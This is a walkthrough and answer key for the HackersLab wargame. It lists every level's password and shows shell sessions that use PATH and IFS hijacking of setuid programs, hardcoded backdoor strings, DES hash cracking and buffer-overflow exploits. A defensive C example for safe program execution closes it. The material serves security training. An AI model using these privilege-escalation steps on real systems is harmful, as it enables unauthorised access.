Mr/ Mrs xxxxxxxxx your current level is 17
The date you achieved your level was 2002-08-18 05:05:01
You sure are a guru!
################################################################################
[ASCII-art banner]
password : access granted
################################################################################
level0: guest
level1: newworld
level2: DoItYourself
level3: hackerproof
level4: AreUReady?
level5: Silent night,holy night!
level6: Best of The Best Hackerslab
level7: Cant help falling in love
level8: wonderful
level9: !secu!
level10: Beauty and Beast
level11: Permission denied
level12: I want to love forever
level13: chl1296rh
level14: To the top
level15: fly to the moon
level16: berserker
level17: qkfkaehfdl
################################################################################
*LEVEL0*
--------------------------------------------------------------------------------
-rwsr-x--- 1 level1 level0 13500 Mar 12 15:38 /dev/.hi
--------------------------------------------------------------------------------
[level0@drill level0]$ find /dev -user level1 -group level0
/dev/.hi
[level0@drill level0]$ /dev/.hi
[level0@drill level0]$ whoami
level1
[level0@drill level0]$ pass
--------------------------------------------------------------------------------
newworld
--------------------------------------------------------------------------------
*LEVEL1*
--------------------------------------------------------------------------------
-rwsr-x--- 1 level2 level1 13987 Jul 5 2001 /usr/bin/amos
--------------------------------------------------------------------------------
[level1@drill level1]$ find /usr -user level2 -group level1 2>/dev/null
/usr/bin/amos
[level1@drill level1]$ /usr/bin/amos
path? /tmp | pass
--------------------------------------------------------------------------------
DoItYourself
--------------------------------------------------------------------------------
*LEVEL2*
--------------------------------------------------------------------------------
-rwsr-x--- 1 level3 level2 13469 Jul 5 2001 /usr/bin/alert
-rwxrwxrwx 1 level3 level2 435 Jul 5 2001 /usr/bin/alert.txt
--------------------------------------------------------------------------------
[level2@drill level2]$ /usr/bin/alert
################################################################################
type '!pass'
################################################################################
hackerproof
--------------------------------------------------------------------------------
*LEVEL3*
--------------------------------------------------------------------------------
-rws--x--- 1 level4 level3 13781 Jul 5 2001 /usr/man/pt_BR/man8/today
--------------------------------------------------------------------------------
[level3@drill level3]$ IFS=/
[level3@drill level3]$ export IFS
[level3@drill level3]$ /usr/man/pt_BR/man8/today
sh: bin: command not found
[level3@drill level3]$ cd tmp
[level3@drill tmp]$ echo "/bin/pass" > bin
[level3@drill tmp]$ chmod +x bin
[level3@drill tmp]$ PATH=./
[level3@drill tmp]$ /usr/man/pt_BR/man8/today
--------------------------------------------------------------------------------
AreUReady?
--------------------------------------------------------------------------------
*LEVEL4*
--------------------------------------------------------------------------------
Kevin likes playing games in Linux. One day, he was bored and had nothing to do
so he decided to play with a source file of the game. He opened the source file
and added some codes and then compiled it. Get the password for the next level
by using this program.
HINT: Apparently, he added only one line into the source.
--------------------------------------------------------------------------------
-rwsr-x--- 1 level5 level4 31416 Jul 11 2001 /usr/games/trojka
--------------------------------------------------------------------------------
[level4@drill level4]$ cd tmp
[level4@drill tmp]$ echo /bin/pass > clear
[level4@drill tmp]$ chmod +x clear
[level4@drill tmp]$ PATH=./
[level4@drill tmp]$ /usr/games/trojka
--------------------------------------------------------------------------------
Silent night,holy night!
--------------------------------------------------------------------------------
*LEVEL5*
--------------------------------------------------------------------------------
A hacker named John made the backdoor for the first problem. He got really angry
when he realized that other HackersLab members were taking his backdoor for
granted. He had worked on it very hard for one day and now he thinks that he can
feel rest assured thinking that no one else can use the backdoor. Drive him mad
again!
--------------------------------------------------------------------------------
-rwsr-x--- 1 level6 level5 14306 Jul 10 2001 /lib/security/pam_auth.so
--------------------------------------------------------------------------------
[level5@drill level5]$ strings /lib/security/pam_auth.so
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
printf
execl
__cxa_finalize
getpass
sleep
__deregister_frame_info
strcmp
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.1.3
GLIBC_2.0
PTRh
QVh,
what the hell are you thinking?
abcd1234
1qaz2wsx
0plmfk3s
qkqh
fj3,n34k$^
fgjk3!mfr*
Best of The Best Hackerslab
--------------------------------------------------------------------------------
*LEVEL6*
--------------------------------------------------------------------------------
On behalf of all those who have worked hard to reach this level, we have opened
a port for you so that you could get the password easily.
But... oops... I don't remember the port number.
Sorry...
--------------------------------------------------------------------------------
[level6@drill level6]$ netstat -ta | grep LISTEN
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:qc                    *:*                     LISTEN
tcp        0      0 *:www                   *:*                     LISTEN
tcp        0      0 *:auth                  *:*                     LISTEN
tcp        0      0 *:ssh                   *:*                     LISTEN
tcp        0      0 *:telnet                *:*                     LISTEN
tcp        0      0 *:smtp                  *:*                     LISTEN
tcp        0      0 *:pspd                  *:*                     LISTEN
[level6@drill level6]$ grep pspd /etc/services
pspd 6969/tcp #level7 problem port
--------------------------------------------------------------------------------
bash-2.05$ telnet drill.hackerslab.org 6969
Trying 203.239.110.20...
Connected to drill.hackerslab.org.
Escape character is '^]'.
--------------------------------------------------------------------------------
bla-bla-bla...
--------------------------------------------------------------------------------
level6's passwd: 'Best of The Best Hackerslab'
Congratulation!! level7's passwd is 'Cant help falling in love'
Connection closed by foreign host.
--------------------------------------------------------------------------------
*LEVEL7*
--------------------------------------------------------------------------------
There is an executable file somewhere that holds the password for the next
level. Unfortunately, it isn't easy to find. You have to figure it out by
yourself this time.
--------------------------------------------------------------------------------
-rwx--x--- 1 level8 level7 12878 Jul 5 2001 /dev/audio2
--------------------------------------------------------------------------------
[level7@drill level7]$ /dev/audio2
VoE4HoQCFfMW2 shadow level8 н κ̴.
--------------------------------------------------------------------------------
level8:VoE4HoQCFfMW2
--------------------------------------------------------------------------------
[xxxxxxxxx@lppri john-1.6]$ run/john -wordfile:wordlists/cracklib.txt level8.txt
Loaded 1 password (Standard DES [24/32 4K])
wonderfu (level8)
guesses: 1 time: 0:00:00:25 100% c/s: 30382 trying: wonderdo - woodbine
--------------------------------------------------------------------------------
wonderful
--------------------------------------------------------------------------------
*LEVEL8*
--------------------------------------------------------------------------------
This problem requires a good understanding of hacking techniques. Use the
technique to the /usr/bin/ps2, which was implemented by the famous 8lgm hackers
club, in order to get the password to the next level.
HINT: A temporary file will be created in var/tmp2.
--------------------------------------------------------------------------------
-rws--x--- 1 level9 level8 15739 Jul 5 2001 /usr/bin/ps2
lrwxrwxrwx 1 root level8 10 Jul 31 2001 /var/tmp2 -> /tmp/tmp2/
-rw-rw-r-- 1 level9 level8 0 Apr 15 15:02 /tmp/tmp2/ps2.tmp
--------------------------------------------------------------------------------
[level8@drill tmp]$ ./level8_exploit.sh level9 Password is !secu!
--------------------------------------------------------------------------------
*LEVEL9*
--------------------------------------------------------------------------------
What happens when you forget to perform `bound checking`?
HINT: /etc/bof
--------------------------------------------------------------------------------
-rws--x--- 1 level10 level9 13577 Jul 10 2001 /etc/bof
--------------------------------------------------------------------------------
[level9@drill level9]$ /etc/bof `perl -e '{print "A"x"75"}'`
hello~ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AA
[level9@drill level9]$ /etc/bof `perl -e '{print "A"x"76"}'`
hello~ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
Segmentation fault
--------------------------------------------------------------------------------
[level9@drill tmp]$ ./level9_exploit 80 28
return address: 0xbffffac0
hello~ ^1FF V ͐1ې@͐/bin/sh
bash$ whoami
level10
bash$ pass
--------------------------------------------------------------------------------
Beauty and Beast
--------------------------------------------------------------------------------
*LEVEL10*
--------------------------------------------------------------------------------
A daemon in the Free Hacking Zone uses the UDP5555 port. This daemon is waiting
for the packets to arrive from the www.hackerslab.org host. The packets include
the email address of the recipient as well as the password for level 10. The
daemon will notify the password for the next level via email as soon as it
receives the packets from www.hackerslab.org.
The format is as follows: `The password of level 10` / `email address`.
Example: If the password for level 10 is `abcd` and the email address is
`abc@aaa.ccc.ddd.rr`, then the message in the packet is abcd/abc@aaa.ccc.ddd.rr
*Remember to send the packet from www.hackerslab.org.
--------------------------------------------------------------------------------
[level10@drill level10]$ grep 5555/udp /etc/services
usd 5555/udp #level11 udp spoofing..port
--------------------------------------------------------------------------------
Permission denied
--------------------------------------------------------------------------------
*LEVEL11*
--------------------------------------------------------------------------------
You can find the /usr/local/bin/passwd.fail file by running the
/usr/local/bin/hof program. However, we want the /usr/local/bin/passwd.success
file which includes the password for the next level. Go get it!
HINT: Use the `heap` area.
--------------------------------------------------------------------------------
-rws--x--- 1 level12 level11 14705 Jul 10 2001 /usr/local/bin/hof
-rwxr-xr-x 1 level12 level12 17 Jul 5 2001 /usr/local/bin/passwd.fail
-rwx------ 1 level12 level12 34 Jul 5 2001 /usr/local/bin/passwd.success
--------------------------------------------------------------------------------
[level11@drill tmp]$ ./level11_exploit 365
level11's Password : view_file = usr/local/bin/passwd.success
error opening usr/local/bin/passwd.success: No such file or directory
[level11@drill tmp]$ ./level11_exploit 364
level11's Password : view_file = /usr/local/bin/passwd.success
н : I want to love forever
--------------------------------------------------------------------------------
*LEVEL12*
--------------------------------------------------------------------------------
Here's the problem for you to solve. Your idol, Jungwoo could capture the
communication contents by a sniffer while the administrators of HackersLab were
logging in level 13. He thought that he could get the password easily with this
but they were communicating secretly by using their own algorithm with the
encrypted password `tu|tSI/Z^`. While he was searching the system, he found a
tool in /usr/bin/encrypt which they used for coding.
Now, this is what you have to do. You can analyze the encryption algorithm by
using the tool. Then, break the encryption for the password.
--------------------------------------------------------------------------------
-rwxr-x--- 1 level13 level12 13781 Jul 5 2001 /usr/bin/encrypt
--------------------------------------------------------------------------------
chl1296rh
--------------------------------------------------------------------------------
*LEVEL13*
--------------------------------------------------------------------------------
[xxxxxxxxx@mashiina hackerslab]$ ./level13_client
Got challenge: query_a = 6965 query_b = 9397 Response = 60
Got challenge: query_a = 7055 query_b = 907 Response = 41
Got challenge: query_a = 4832 query_b = 5462 Response = 83
Password for next level = "To the top"
--------------------------------------------------------------------------------
*LEVEL14*
--------------------------------------------------------------------------------
You know there is a program that shows you the password for the level you are
on, but something has gone wrong ... what is it?
--------------------------------------------------------------------------------
---x--x--- 1 level15 level14 974519 Jul 5 2001 /bin/pass.old
--------------------------------------------------------------------------------
[level14@drill level14]$ /bin/pass.old
Ϲ ̵ Դϴ.
--------------------------------------------------------------------------------
[level14@drill tmp]$ ./level14_so_called_exploit&
[1] 11160
[level14@drill tmp]$ gdb level14_so_called_exploit 11160
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
/tmp/level14_tmp/11160: No such file or directory.
Attaching to program: /tmp/level14_tmp/level14_so_called_exploit, Pid 11160
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
0x400a9c41 in __libc_nanosleep () from /lib/libc.so.6
(gdb) c
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x80480f0 in ?? ()
(gdb) x/s 0x8071bc2
0x8071bc2: "fly to the moon"
--------------------------------------------------------------------------------
*LEVEL15*
--------------------------------------------------------------------------------
Bangdoll, the most stupid programmer in the Universe has coded a new version of
a program he wrote earlier, and again, it has a serious bug! No Wonder!
Hint: Use a one-byte overflow
--------------------------------------------------------------------------------
-rws--x--- 1 level16 level15 964040 Jul 5 2001 /etc/one
--------------------------------------------------------------------------------
[level15@drill level15]$ /etc/one xxxxxxxxx
HELLO~~ xxxxxxxxx
[level15@drill level15]$ /etc/one `perl -e '{print "A"x"32"}'`
HELLO~~ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA**˃
[level15@drill level15]$ /etc/one `perl -e '{print "A"x"33"}'`
HELLO~~ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA))˃
Segmentation fault
[level15@drill level15]$ /etc/one `perl -e '{print "A"x"34"}'`
your name is too long!!
--------------------------------------------------------------------------------
[level15@drill tmp]$ ./level15_exploit 38
Using address: 0xbffffad8
[level15@drill level15_tmp]$ /etc/one $RET
HELLO~~ ??
bash$ pass
--------------------------------------------------------------------------------
berserker
--------------------------------------------------------------------------------
*LEVEL16*
--------------------------------------------------------------------------------
You can solve this problem by using format string.
--------------------------------------------------------------------------------
-rws--x--- 1 level17 level16 963025 Jul 5 2001 /usr/local/bin/format
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
qkfkaehfdl
--------------------------------------------------------------------------------
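
The LEVEL3 and LEVEL4 sessions above succeed because the setuid program lets the caller's PATH and IFS decide which file is executed. The following is an added example, not part of the original write-up or of the wargame's code: a way for a privileged C program to run a helper so that neither variable has any influence. The names run_fixed, CLEAN_ENV and demo_hostile_env are hypothetical, and it is an assumption that the original binaries started their helper through a shell.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for every child; nothing is inherited from the caller. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", "IFS= \t\n", NULL };

/* Run an absolute-path program directly: no shell, no PATH search.
 * Returns the child's exit status, or -1 if refused or on failure.
 * (A real setuid program would also drop privileges in the child.) */
int run_fixed(const char *abs_path, char *const argv[])
{
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;              /* refuse names that need a PATH lookup */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, CLEAN_ENV);
        _exit(127);             /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Constructed demo: the caller's environment mirrors the LEVEL3/LEVEL4 sessions
 * (PATH=./ and IFS=/), yet the child sees only CLEAN_ENV. Returns 0 if so. */
int demo_hostile_env(void)
{
    setenv("PATH", "./", 1);
    setenv("IFS", "/", 1);
    char *const argv[] = { "sh", "-c", "test \"$PATH\" = /usr/bin:/bin", NULL };
    return run_fixed("/bin/sh", argv);
}

int main(void)
{
    printf("child PATH is clean: %s\n", demo_hostile_env() == 0 ? "yes" : "no");
    return 0;
}
```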